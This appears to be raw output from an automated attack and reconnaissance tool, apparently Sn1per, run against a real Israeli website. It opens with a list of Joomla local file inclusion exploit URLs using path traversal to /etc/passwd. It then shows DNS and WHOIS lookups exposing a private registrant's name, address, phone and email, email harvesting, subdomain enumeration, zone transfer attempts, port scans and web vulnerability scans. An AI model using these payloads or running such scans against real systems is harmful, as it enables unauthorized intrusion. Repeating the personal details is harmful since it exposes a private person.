  1207. Exploit: /index.php?option=com_delicious&controller=../../../../../../../../../../etc/passwd%00
  1208. Vulnerable? Yes
  1209.  
  1210. # 593
  1211. Info -> Component: Joomla Component JA Comment com_jacomment Local File Inclusion Vulnerability
  1212. Versions Affected: Any <=
  1213. Check: /index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00
  1214. Exploit: /index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00
  1215. Vulnerable? Yes
  1216.  
  1217. # 594
  1218. Info -> Component: Joomla Component Love Factory com_lovefactory Local File Inclusion Vulnerability
  1219. Versions Affected: Any <=
  1220. Check: /index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00
  1221. Exploit: /index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00
  1222. Vulnerable? Yes
  1223.  
  1224. # 595
  1225. Info -> Component: Joomla com_worldrates Local File Inclusion Vulnerability
  1226. Versions Affected: Any <=
  1227. Check: /index.php?option=com_worldrates&controller=../../../../../../../../../../etc/passwd%00
  1228. Exploit: /index.php?option=com_worldrates&controller=../../../../../../../../../../etc/passwd%00
  1229. Vulnerable? Yes
  1230.  
  1231. # 596
  1232. Info -> Component: Joomla com_record Local File Inclusion Vulnerability
  1233. Versions Affected: Any <=
  1234. Check: /index.php?option=com_record&controller=../../../../../../../../../../etc/passwd%00
  1235. Exploit: /index.php?option=com_record&controller=../../../../../../../../../../etc/passwd%00
  1236. Vulnerable? Yes
  1237.  
  1238. # 597
  1239. Info -> Component: Joomla Component JA Voice com_javoice Local File Inclusion vulnerability
  1240. Versions Affected: Any <=
  1241. Check: /index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00
  1242. Exploit: /index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00
  1243. Vulnerable? Yes
  1244.  
  1245. # 598
  1246. Info -> Component: Joomla Component com_pcchess Local File Inclusion
  1247. Versions Affected: Any <=
  1248. Check: /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../etc/passwd%00
  1249. Exploit: /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../etc/passwd%00
  1250. Vulnerable? Yes
  1251. [92m + -- ----------------------------=[Running Nslookup]=------------------------ -- +
  1252. Server: 192.168.1.254
  1253. Address: 192.168.1.254#53
  1254.  
  1255. Non-authoritative answer:
  1256. Name: flybox.co.il
  1257. Address: 104.31.75.239
  1258. Name: flybox.co.il
  1259. Address: 104.31.74.239
  1260. Name: flybox.co.il
  1261. Address: 2400:cb00:2048:1::681f:4bef
  1262. Name: flybox.co.il
  1263. Address: 2400:cb00:2048:1::681f:4aef
  1264.  
  1265. flybox.co.il has address 104.31.74.239
  1266. flybox.co.il has address 104.31.75.239
  1267. flybox.co.il has IPv6 address 2400:cb00:2048:1::681f:4aef
  1268. flybox.co.il has IPv6 address 2400:cb00:2048:1::681f:4bef
  1269. flybox.co.il mail is handled by 75 alt2.aspmx.l.google.com.
  1270. flybox.co.il mail is handled by 125 aspmx3.googlemail.com.
  1271. flybox.co.il mail is handled by 50 alt1.aspmx.l.google.com.
  1272. flybox.co.il mail is handled by 0 aspmx.l.google.com.
  1273. flybox.co.il mail is handled by 100 aspmx2.googlemail.com.
  1274.  + -- ----------------------------=[Checking OS Fingerprint]=----------------- -- +
  1275.  
  1276. Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu
  1277.  
  1278. [+] Target is flybox.co.il
  1279. [+] Loading modules.
  1280. [+] Following modules are loaded:
  1281. [x] [1] ping:icmp_ping - ICMP echo discovery module
  1282. [x] [2] ping:tcp_ping - TCP-based ping discovery module
  1283. [x] [3] ping:udp_ping - UDP-based ping discovery module
  1284. [x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation
  1285. [x] [5] infogather:portscan - TCP and UDP PortScanner
  1286. [x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module
  1287. [x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module
  1288. [x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module
  1289. [x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module
  1290. [x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module
  1291. [x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module
  1292. [x] [12] fingerprint:smb - SMB fingerprinting module
  1293. [x] [13] fingerprint:snmp - SNMPv2c fingerprinting module
  1294. [+] 13 modules registered
  1295. [+] Initializing scan engine
  1296. [+] Running scan engine
  1297. [-] ping:tcp_ping module: no closed/open TCP ports known on 104.31.75.239. Module test failed
  1298. [-] ping:udp_ping module: no closed/open UDP ports known on 104.31.75.239. Module test failed
  1299. [-] No distance calculation. 104.31.75.239 appears to be dead or no ports known
  1300. [+] Host: 104.31.75.239 is up (Guess probability: 50%)
  1301. [+] Target: 104.31.75.239 is alive. Round-Trip Time: 0.49955 sec
  1302. [+] Selected safe Round-Trip Time value is: 0.99909 sec
  1303. [-] fingerprint:tcp_hshake Module execution aborted (no open TCP ports known)
  1304. [-] fingerprint:smb need either TCP port 139 or 445 to run
  1305. [+] Primary guess:
  1306. [+] Host 104.31.75.239 Running OS: »ÎlU (Guess probability: 100%)
  1307. [+] Other guesses:
  1308. [+] Host 104.31.75.239 Running OS: (Guess probability: 100%)
  1309. [+] Host 104.31.75.239 Running OS: (Guess probability: 100%)
  1310. [+] Host 104.31.75.239 Running OS: (Guess probability: 100%)
  1311. [+] Host 104.31.75.239 Running OS: »ÎlU (Guess probability: 100%)
  1312. [+] Host 104.31.75.239 Running OS: (Guess probability: 100%)
  1313. [+] Host 104.31.75.239 Running OS: »ÎlU (Guess probability: 100%)
  1314. [+] Host 104.31.75.239 Running OS: (Guess probability: 100%)
  1315. [+] Host 104.31.75.239 Running OS: (Guess probability: 100%)
  1316. [+] Host 104.31.75.239 Running OS: (Guess probability: 100%)
  1317. [+] Cleaning up scan engine
  1318. [+] Modules deinitialized
  1319. [+] Execution completed.
  1320.  + -- ----------------------------=[Gathering Whois Info]=-------------------- -- +
  1321.  
  1322. % The data in the WHOIS database of the .il registry is provided
  1323. % by ISOC-IL for information purposes, and to assist persons in
  1324. % obtaining information about or related to a domain name
  1325. % registration record. ISOC-IL does not guarantee its accuracy.
  1326. % By submitting a WHOIS query, you agree that you will use this
  1327. % Data only for lawful purposes and that, under no circumstances
  1328. % will you use this Data to: (1) allow, enable, or otherwise
  1329. % support the transmission of mass unsolicited, commercial
  1330. % advertising or solicitations via e-mail (spam);
  1331. % or (2) enable high volume, automated, electronic processes that
  1332. % apply to ISOC-IL (or its systems).
  1333. % ISOC-IL reserves the right to modify these terms at any time.
  1334. % By submitting this query, you agree to abide by this policy.
  1335.  
  1336. query: flybox.co.il
  1337.  
  1338. reg-name: flybox
  1339. domain: flybox.co.il
  1340.  
  1341. descr: Ofer Bar
  1342. descr: Kibutz Hulda
  1343. descr: Kibutz Hulda
  1344. descr: 11111
  1345. descr: Israel
  1346. phone: +972 54 3035371
  1347. fax-no: +972 9 9574370
  1348. admin-c: IS-OB5539-IL
  1349. tech-c: IS-ID1078-IL
  1350. zone-c: IS-ID1078-IL
  1351. nserver: athena.ns.cloudflare.com
  1352. nserver: vin.ns.cloudflare.com
  1353. validity: 04-09-2019
  1354. DNSSEC: unsigned
  1355. status: Transfer Locked
  1356. changed: domain-registrar AT isoc.org.il 20130904 (Assigned)
  1357. changed: domain-registrar AT isoc.org.il 20161012 (Changed)
  1358.  
  1359. person: Ofer Bar
  1360. address: Ofer Bar
  1361. address: Kibutz Hulda
  1362. address: Kibutz Hulda
  1363. address: 11111
  1364. address: Israel
  1365. phone: +972 54 3035371
  1366. fax-no: +972 9 9574370
  1367. e-mail: tsahye AT gmail.com
  1368. nic-hdl: IS-OB5539-IL
  1369. changed: domain-registrar AT isoc.org.il 20130904
  1370. changed: Managing Registrar 20150805
  1371.  
  1372. person: Interspace Domreg
  1373. address: Interspace Ltd.
  1374. address: P.O.Box 8723
  1375. address: Netanya
  1376. address: 42505
  1377. address: Israel
  1378. phone: +972 73 2224444
  1379. fax-no: +972 73 2224440
  1380. e-mail: domreg AT interspace.net
  1381. nic-hdl: IS-ID1078-IL
  1382. changed: Managing Registrar 20070110
  1383. changed: Managing Registrar 20070319
  1384. changed: Managing Registrar 20070909
  1385. changed: Managing Registrar 20090514
  1386. changed: Managing Registrar 20110720
  1387. changed: Managing Registrar 20110720
  1388. changed: Managing Registrar 20110721
  1389. changed: Managing Registrar 20111128
  1390. changed: Managing Registrar 20111128
  1391. changed: Managing Registrar 20130924
  1392. changed: Managing Registrar 20130924
  1393. changed: Managing Registrar 20130924
  1394. changed: Managing Registrar 20130924
  1395. changed: Managing Registrar 20130924
  1396. changed: Managing Registrar 20170518
  1397. changed: Managing Registrar 20170716
  1398.  
  1399. registrar name: InterSpace Ltd
  1400. registrar info: http://www.internic.co.il
  1401.  
  1402. % Rights to the data above are restricted by copyright.
  1403.  + -- ----------------------------=[Gathering OSINT Info]=-------------------- -- +
  1404.  
  1405. *******************************************************************
  1406. * *
  1407. * | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
  1408. * | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
  1409. * | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
  1410. * \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
  1411. * *
  1412. * TheHarvester Ver. 2.7 *
  1413. * Coded by Christian Martorella *
  1414. * Edge-Security Research *
  1415. * cmartorella@edge-security.com *
  1416. *******************************************************************
  1417.  
  1418.  
  1419. Full harvest..
  1420. [-] Searching in Google..
  1421. Searching 0 results...
  1422. Searching 100 results...
  1423. Searching 200 results...
  1424. [-] Searching in PGP Key server..
  1425. [-] Searching in Bing..
  1426. Searching 50 results...
  1427. Searching 100 results...
  1428. Searching 150 results...
  1429. Searching 200 results...
  1430. [-] Searching in Exalead..
  1431. Searching 50 results...
  1432. Searching 100 results...
  1433. Searching 150 results...
  1434. Searching 200 results...
  1435. Searching 250 results...
  1436.  
  1437.  
  1438. [+] Emails found:
  1439. ------------------
  1440. info@flybox.co.il
  1441. liron@flybox.co.il
  1442.  
  1443. [+] Hosts found in search engines:
  1444. ------------------------------------
  1445. [-] Resolving hostnames IPs...
  1446. 104.31.75.239:www.flybox.co.il
  1447. [+] Virtual hosts:
  1448. ==================
  1449. 104.31.75.239 hoc
  1450. 104.31.75.239 www.flybox.co.il
  1451. 104.31.75.239 www.fedsmith
  1452. 104.31.75.239 www.isadanislam.org
  1453. 104.31.75.239 hocltd.com
  1454. 104.31.75.239 www.fedsmith.com
  1455.  
  1456. ******************************************************
  1457. * /\/\ ___| |_ __ _ __ _ ___ ___ / _(_) | *
  1458. * / \ / _ \ __/ _` |/ _` |/ _ \ / _ \| |_| | | *
  1459. * / /\/\ \ __/ || (_| | (_| | (_) | (_) | _| | | *
  1460. * \/ \/\___|\__\__,_|\__, |\___/ \___/|_| |_|_| *
  1461. * |___/ *
  1462. * Metagoofil Ver 2.2 *
  1463. * Christian Martorella *
  1464. * Edge-Security.com *
  1465. * cmartorella_at_edge-security.com *
  1466. ******************************************************
  1467.  
  1468. [-] Starting online search...
  1469.  
  1470. [-] Searching for doc files, with a limit of 200
  1471. Searching 100 results...
  1472. Searching 200 results...
  1473. Results: 0 files found
  1474. Starting to download 50 of them:
  1475. ----------------------------------------
  1476.  
  1477.  
  1478. [-] Searching for pdf files, with a limit of 200
  1479. Searching 100 results...
  1480. Searching 200 results...
  1481. Results: 0 files found
  1482. Starting to download 50 of them:
  1483. ----------------------------------------
  1484.  
  1485.  
  1486. [-] Searching for xls files, with a limit of 200
  1487. Searching 100 results...
  1488. Searching 200 results...
  1489. Results: 0 files found
  1490. Starting to download 50 of them:
  1491. ----------------------------------------
  1492.  
  1493.  
  1494. [-] Searching for csv files, with a limit of 200
  1495. Searching 100 results...
  1496. Searching 200 results...
  1497. Results: 0 files found
  1498. Starting to download 50 of them:
  1499. ----------------------------------------
  1500.  
  1501.  
  1502. [-] Searching for txt files, with a limit of 200
  1503. Searching 100 results...
  1504. Searching 200 results...
  1505. Results: 0 files found
  1506. Starting to download 50 of them:
  1507. ----------------------------------------
  1508.  
  1509. processing
  1510. user
  1511. email
  1512.  
  1513. [+] List of users found:
  1514. --------------------------
  1515.  
  1516. [+] List of software found:
  1517. -----------------------------
  1518.  
  1519. [+] List of paths and servers found:
  1520. ---------------------------------------
  1521.  
  1522. [+] List of e-mails found:
  1523. ----------------------------
  1524.  + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +
  1525.  
  1526. ; <<>> DiG 9.11.2-5-Debian <<>> -x flybox.co.il
  1527. ;; global options: +cmd
  1528. ;; Got answer:
  1529. ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 61983
  1530. ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
  1531.  
  1532. ;; OPT PSEUDOSECTION:
  1533. ; EDNS: version: 0, flags:; udp: 4096
  1534. ;; QUESTION SECTION:
  1535. ;il.co.flybox.in-addr.arpa. IN PTR
  1536.  
  1537. ;; AUTHORITY SECTION:
  1538. in-addr.arpa. 3600 IN SOA b.in-addr-servers.arpa. nstld.iana.org. 2017102519 1800 900 604800 3600
  1539.  
  1540. ;; Query time: 489 msec
  1541. ;; SERVER: 192.168.1.254#53(192.168.1.254)
  1542. ;; WHEN: Sun Dec 31 03:23:31 EST 2017
  1543. ;; MSG SIZE rcvd: 122
  1544.  
  1545. dnsenum VERSION:1.2.4
  1546. 
  1547. ----- flybox.co.il -----
  1548. 
  1549.  
  1550. Host's addresses:
  1551. __________________
  1552.  
  1553. flybox.co.il. 211 IN A 104.31.74.239
  1554. flybox.co.il. 211 IN A 104.31.75.239
  1555. 
  1556.  
  1557. Name Servers:
  1558. ______________
  1559.  
  1560. vin.ns.cloudflare.com. 84028 IN A 173.245.59.245
  1561. athena.ns.cloudflare.com. 67779 IN A 173.245.58.72
  1562. 
  1563.  
  1564. Mail (MX) Servers:
  1565. ___________________
  1566.  
  1567. aspmx3.googlemail.com. 293 IN A 209.85.202.26
  1568. alt1.aspmx.l.google.com. 293 IN A 64.233.186.26
  1569. aspmx.l.google.com. 293 IN A 209.85.232.26
  1570. aspmx2.googlemail.com. 293 IN A 64.233.186.26
  1571. alt2.aspmx.l.google.com. 293 IN A 209.85.202.26
  1572. 
  1573.  
  1574. Trying Zone Transfers and getting Bind Versions:
  1575. _________________________________________________
  1576.  
  1577. 
  1578. Trying Zone Transfer for flybox.co.il on vin.ns.cloudflare.com ...
  1579.  
  1580. Trying Zone Transfer for flybox.co.il on athena.ns.cloudflare.com ...
  1581.  
  1582. brute force file not specified, bay.
  1583.  + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +
  1584. 
  1585. ____ _ _ _ _ _____
  1586. / ___| _ _| |__ | (_)___| |_|___ / _ __
  1587. \___ \| | | | '_ \| | / __| __| |_ \| '__|
  1588. ___) | |_| | |_) | | \__ \ |_ ___) | |
  1589. |____/ \__,_|_.__/|_|_|___/\__|____/|_|
  1590.  
  1591. # Coded By Ahmed Aboul-Ela - @aboul3la
  1592.  
  1593. [-] Enumerating subdomains now for flybox.co.il
  1594. [-] verbosity is enabled, will show the subdomains results in realtime
  1595. [-] Searching now in Baidu..
  1596. [-] Searching now in Yahoo..
  1597. [-] Searching now in Google..
  1598. [-] Searching now in Bing..
  1599. [-] Searching now in Ask..
  1600. [-] Searching now in Netcraft..
  1601. [-] Searching now in DNSdumpster..
  1602. [-] Searching now in Virustotal..
  1603. [-] Searching now in ThreatCrowd..
  1604. [-] Searching now in SSL Certificates..
  1605. [-] Searching now in PassiveDNS..
  1606. SSL Certificates: vip.flybox.co.il
  1607. SSL Certificates: www.flybox.co.il
  1608. Yahoo: www.flybox.co.il
  1609. Yahoo: vip.flybox.co.il
  1610. Virustotal: vip.flybox.co.il
  1611. Virustotal: landing.flybox.co.il
  1612. Virustotal: www.flybox.co.il
  1613. DNSdumpster: www.flybox.co.il
  1614. Bing: vip.flybox.co.il
  1615. Google: vip.flybox.co.il
  1616. [-] Saving results to file: /usr/share/sniper/loot/domains/domains-flybox.co.il.txt
  1617. [-] Total Unique Subdomains Found: 3
  1618. www.flybox.co.il
  1619. landing.flybox.co.il
  1620. vip.flybox.co.il
  1621.  
  1622.  ╔═╗╩═╗╔╩╗╔═╗╩ ╩
  1623.  ║ ╠╩╝ ║ ╚═╗╠═╣
  1624.  ╚═╝╩╚═ ╩o╚═╝╩ ╩
  1625.  + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +
  1626. 
  1627. *.flybox.co.il
  1628. vip.flybox.co.il
  1629. www.flybox.co.il
  1630.  [+] Domains saved to: /usr/share/sniper/loot/domains/domains-flybox.co.il-full.txt
  1631. 
  1632.  + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +
  1633.  + -- ----------------------------=[Checking Email Security]=----------------- -- +
  1634.  
  1635.  + -- ----------------------------=[Pinging host]=---------------------------- -- +
  1636. PING flybox.co.il(2400:cb00:2048:1::681f:4bef (2400:cb00:2048:1::681f:4bef)) 56 data bytes
  1637. 64 bytes from 2400:cb00:2048:1::681f:4bef (2400:cb00:2048:1::681f:4bef): icmp_seq=1 ttl=60 time=29.3 ms
  1638.  
  1639. --- flybox.co.il ping statistics ---
  1640. 1 packets transmitted, 1 received, 0% packet loss, time 0ms
  1641. rtt min/avg/max/mdev = 29.300/29.300/29.300/0.000 ms
  1642.  
  1643.  + -- ----------------------------=[Running TCP port scan]=------------------- -- +
  1644.  
  1645. Starting Nmap 7.60 ( https://nmap.org ) at 2017-12-31 03:24 EST
  1646. Nmap scan report for flybox.co.il (104.31.74.239)
  1647. Host is up (0.30s latency).
  1648. Other addresses for flybox.co.il (not scanned): 2400:cb00:2048:1::681f:4aef 2400:cb00:2048:1::681f:4bef 104.31.75.239
  1649. Not shown: 468 filtered ports
  1650. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  1651. PORT STATE SERVICE
  1652. 80/tcp open http
  1653. 443/tcp open https
  1654. 8080/tcp open http-proxy
  1655. 8443/tcp open https-alt
  1656. 8880/tcp open cddbp-alt
  1657.  
  1658. Nmap done: 1 IP address (1 host up) scanned in 17.31 seconds
  1659.  
  1660.  + -- ----------------------------=[Running Intrusive Scans]=----------------- -- +
  1661.  + -- --=[Port 21 closed... skipping.
  1662.  + -- --=[Port 22 closed... skipping.
  1663.  + -- --=[Port 23 closed... skipping.
  1664.  + -- --=[Port 25 closed... skipping.
  1665.  + -- --=[Port 53 closed... skipping.
  1666.  + -- --=[Port 79 closed... skipping.
  1667.  + -- --=[Port 80 opened... running tests...
  1668.  + -- ----------------------------=[Checking for WAF]=------------------------ -- +
  1669.  
  1670. ^ ^
  1671. _ __ _ ____ _ __ _ _ ____
  1672. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  1673. | V V // o // _/ | V V // 0 // 0 // _/
  1674. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  1675. <
  1676. ...'
  1677.  
  1678. WAFW00F - Web Application Firewall Detection Tool
  1679.  
  1680. By Sandro Gauci && Wendel G. Henrique
  1681.  
  1682. Checking http://flybox.co.il
  1683. The site http://flybox.co.il is behind a CloudFlare
  1684. Number of requests: 1
  1685.  
  1686.  + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +
  1687. http://flybox.co.il [301 Moved Permanently] CloudFlare, Cookies[__cfduid], Country[UNITED STATES][US], HTTPServer[cloudflare], HttpOnly[__cfduid], IP[104.31.75.239], RedirectLocation[https://flybox.co.il/], Title[301 Moved Permanently], UncommonHeaders[cf-ray]
  1688. https://flybox.co.il/ [301 Moved Permanently] CloudFlare, Cookies[PHPSESSID,__cfduid,qtrans_front_language], Country[UNITED STATES][US], HTTPServer[cloudflare], HttpOnly[__cfduid], IP[104.31.75.239], PHP[7.0.13], RedirectLocation[https://www.flybox.co.il/], UncommonHeaders[cf-ray], X-Powered-By[PHP/7.0.13]
  1689. https://www.flybox.co.il/ [200 OK] CloudFlare, Cookies[PHPSESSID,__cfduid,qtrans_front_language], Country[UNITED STATES][US], Frame, Google-Analytics[Universal][UA-87930745-1], HTML5, HTTPServer[cloudflare], HttpOnly[__cfduid], IP[104.31.75.239], JQuery[1.0.5,2.1.3], MetaGenerator[WooCommerce 2.5.5,WordPress 4.5.6,qTranslate-X 3.4.6.8], Open-Graph-Protocol[website], PHP[7.0.13], Script[application/ld+json,text/javascript], Title[Flybox - אט׹קשיה במ׹כז לכל המש׀חה והחב׹ים! מנהךת ׹וח הגיעה לישךאל], UncommonHeaders[link,access-control-allow-origin,cf-ray], Vimeo, WordPress[4.5.6], X-Powered-By[PHP/7.0.13], X-UA-Compatible[IE=edge]
  1690.  
  1691.  __ ______ _____ 
  1692.  \ \/ / ___|_ _|
  1693.  \ /\___ \ | | 
  1694.  / \ ___) || | 
  1695.  /_/\_|____/ |_| 
  1696.  
  1697. + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
  1698. + -- --=[Target: flybox.co.il:80
  1699. + -- --=[Site not vulnerable to Cross-Site Tracing!
  1700. + -- --=[Site not vulnerable to Host Header Injection!
  1701. + -- --=[Site vulnerable to Cross-Frame Scripting!
  1702. + -- --=[Site vulnerable to Clickjacking!
  1703.  
  1704. HTTP/1.1 405 Not Allowed
  1705. Date: Sun, 31 Dec 2017 08:24:32 GMT
  1706. Content-Type: text/html
  1707. Content-Length: 177
  1708. Connection: close
  1709. Server: cloudflare-nginx
  1710. CF-RAY: -
  1711.  
  1712. <html>
  1713. <head><title>405 Not Allowed</title></head>
  1714. <body bgcolor="white">
  1715. <center><h1>405 Not Allowed</h1></center>
  1716. <hr><center>cloudflare-nginx</center>
  1717. </body>
  1718. </html>
  1719. 
  1720. HTTP/1.1 301 Moved Permanently
  1721. Date: Sun, 31 Dec 2017 08:24:33 GMT
  1722. Content-Type: text/html; charset=iso-8859-1
  1723. Transfer-Encoding: chunked
  1724. Connection: keep-alive
  1725. Set-Cookie: __cfduid=d3b25843681417713efeeea362ec03e091514708673; expires=Mon, 31-Dec-18 08:24:33 GMT; path=/; domain=.flybox.co.il; HttpOnly
  1726. Location: https://flybox.co.il/
  1727. Server: cloudflare
  1728. CF-RAY: 3d5bd7d943b108e4-CDG
  1729.  
  1730. e5
  1731. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  1732. <html><head>
  1733. <title>301 Moved Permanently</title>
  1734. </head><body>
  1735. <h1>Moved Permanently</h1>
  1736. <p>The document has moved <a href="https://flybox.co.il/">here</a>.</p>
  1737. </body></html>
  1738.  
  1739. 0
  1740.  
  1741. 
  1742.  
  1743.  
  1744.  
  1745.  + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +
  1746. + -- --=[Checking if X-Content options are enabled on flybox.co.il... 
  1747.  
  1748. + -- --=[Checking if X-Frame options are enabled on flybox.co.il... 
  1749.  
  1750. + -- --=[Checking if X-XSS-Protection header is enabled on flybox.co.il... 
  1751.  
  1752. + -- --=[Checking HTTP methods on flybox.co.il... 
  1753.  
  1754. + -- --=[Checking if TRACE method is enabled on flybox.co.il... 
  1755.  
  1756. + -- --=[Checking for META tags on flybox.co.il... 
  1757.  
  1758. + -- --=[Checking for open proxy on flybox.co.il... 
  1759. </div><!-- /#cf-wrapper -->
  1760.  
  1761. <script type="text/javascript">
  1762. window._cf_translation = {};
  1763.  
  1764.  
  1765. </script>
  1766.  
  1767. </body>
  1768. </html>
  1769.  
  1770. + -- --=[Enumerating software on flybox.co.il... 
  1771. Server: cloudflare
  1772.  
  1773. + -- --=[Checking if Strict-Transport-Security is enabled on flybox.co.il... 
  1774.  
  1775. + -- --=[Checking for Flash cross-domain policy on flybox.co.il... 
  1776. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  1777. <html><head>
  1778. <title>301 Moved Permanently</title>
  1779. </head><body>
  1780. <h1>Moved Permanently</h1>
  1781. <p>The document has moved <a href="https://flybox.co.il/crossdomain.xml">here</a>.</p>
  1782. </body></html>
  1783.  
  1784. + -- --=[Checking for Silverlight cross-domain policy on flybox.co.il... 
  1785. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  1786. <html><head>
  1787. <title>301 Moved Permanently</title>
  1788. </head><body>
  1789. <h1>Moved Permanently</h1>
  1790. <p>The document has moved <a href="https://flybox.co.il/clientaccesspolicy.xml">here</a>.</p>
  1791. </body></html>
  1792.  
  1793. + -- --=[Checking for HTML5 cross-origin resource sharing on flybox.co.il... 
  1794.  
  1795. + -- --=[Retrieving robots.txt on flybox.co.il... 
  1796. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  1797. <html><head>
  1798. <title>301 Moved Permanently</title>
  1799. </head><body>
  1800. <h1>Moved Permanently</h1>
  1801. <p>The document has moved <a href="https://flybox.co.il/robots.txt">here</a>.</p>
  1802. </body></html>
  1803.  
  1804. + -- --=[Retrieving sitemap.xml on flybox.co.il... 
  1805. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  1806. <html><head>
  1807. <title>301 Moved Permanently</title>
  1808. </head><body>
  1809. <h1>Moved Permanently</h1>
  1810. <p>The document has moved <a href="https://flybox.co.il/sitemap.xml">here</a>.</p>
  1811. </body></html>
  1812.  
  1813. + -- --=[Checking cookie attributes on flybox.co.il... 
  1814. Set-Cookie: __cfduid=d9bbe540dd477159e31148488172304ef1514708677; expires=Mon, 31-Dec-18 08:24:37 GMT; path=/; domain=.flybox.co.il; HttpOnly
  1815.  
  1816. + -- --=[Checking for ASP.NET Detailed Errors on flybox.co.il... 
  1817. jQuery("input#footernewsletter").removeClass("error")
  1818. jQuery("input#footernewsletter").addClass("error")
  1819. if( returned_data.result == 'error' ) {
  1820. <body class="rtl error404">
  1821.  
  1822. 
  1823.  + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +
  1824. - Nikto v2.1.6
  1825. ---------------------------------------------------------------------------
  1826. + Target IP: 104.31.75.239
  1827. + Target Hostname: flybox.co.il
  1828. + Target Port: 80
  1829. + Start Time: 2017-12-31 03:24:41 (GMT-5)
  1830. ---------------------------------------------------------------------------
  1831. + Server: cloudflare
  1832. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  1833. + Uncommon header 'cf-ray' found, with contents: 3d5bd80e62396908-CDG
  1834. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  1835. + All CGI directories 'found', use '-C none' to test none
  1836. + Server banner has changed from 'cloudflare' to 'cloudflare-nginx' which may suggest a WAF, load balancer or proxy is in place
  1837. + Scan terminated: 17 error(s) and 3 item(s) reported on remote host
  1838. + End Time: 2017-12-31 05:16:15 (GMT-5) (6694 seconds)
  1839. ---------------------------------------------------------------------------
  1840. + 1 host(s) tested
  1841.  + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +
  1842. [+] Screenshot saved to /usr/share/sniper/loot/screenshots/flybox.co.il-port80.jpg
  1843.  + -- ----------------------------=[Running Google Hacking Queries]=--------------------- -- +
  1844.  + -- ----------------------------=[Running InUrlBR OSINT Queries]=---------- -- +
  1845.  
  1846.  _____  .701F. .iBR. .7CL. .70BR. .7BR. .7BR'''Cq. .70BR. .1BR'''Yp, .8BR'''Cq.
  1847.  (_____) 01 01N. C 01 C 01 .01. 01  01 Yb 01 .01.
  1848.  (() ()) 01 C YCb C 01 C 01 ,C9 01  01 dP 01 ,C9
  1849.  \ /  01 C .CN. C 01 C 0101dC9 01  01'''bg. 0101dC9
  1850.  \ /  01 C .01.C 01 C 01 YC. 01 ,  01 .Y 01 YC.
  1851.  /=\  01 C Y01 YC. ,C 01 .Cb. 01 ,C  01 ,9 01 .Cb.
  1852.  [___]  .J01L. .JCL. YC .b0101d'. .J01L. .J01. .J01010101C .J0101Cd9 .J01L. .J01./ 2.1
  1853.  
  1854. __[ ! ] Neither war between hackers, nor peace for the system.
  1855. __[ ! ] http://blog.inurl.com.br
  1856. __[ ! ] http://fb.com/InurlBrasil
  1857. __[ ! ] http://twitter.com/@googleinurl
  1858. __[ ! ] http://github.com/googleinurl
  1859. __[ ! ] Current PHP version::[ 7.0.26-1 ]
  1860. __[ ! ] Current script owner::[ root ]
  1861. __[ ! ] Current uname::[ Linux Kali 4.14.0-kali1-amd64 #1 SMP Debian 4.14.2-1kali1 (2017-12-04) x86_64 ]
  1862. __[ ! ] Current pwd::[ /usr/share/sniper ]
  1863. __[ ! ] Help: php inurlbr.php --help
  1864. ------------------------------------------------------------------------------------------------------------------------
  1865.  
  1866. [ ! ] Starting SCANNER INURLBR 2.1 at [31-12-2017 05:18:24]
  1867. [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
  1868. It is the end user's responsibility to obey all applicable local, state and federal laws.
  1869. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  1870.  
  1871. [ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-flybox.co.il.txt ]
  1872. [ INFO ][ DORK ]::[ site:flybox.co.il ]
  1873. [ INFO ][ SEARCHING ]:: {
  1874. [ INFO ][ ENGINE ]::[ GOOGLE - www.google.vu ]
  1875.  
  1876. [ INFO ][ SEARCHING ]:: 
  1877. -[:::]
  1878. [ INFO ][ ENGINE ]::[ GOOGLE API ]
  1879.  
  1880. [ INFO ][ SEARCHING ]:: 
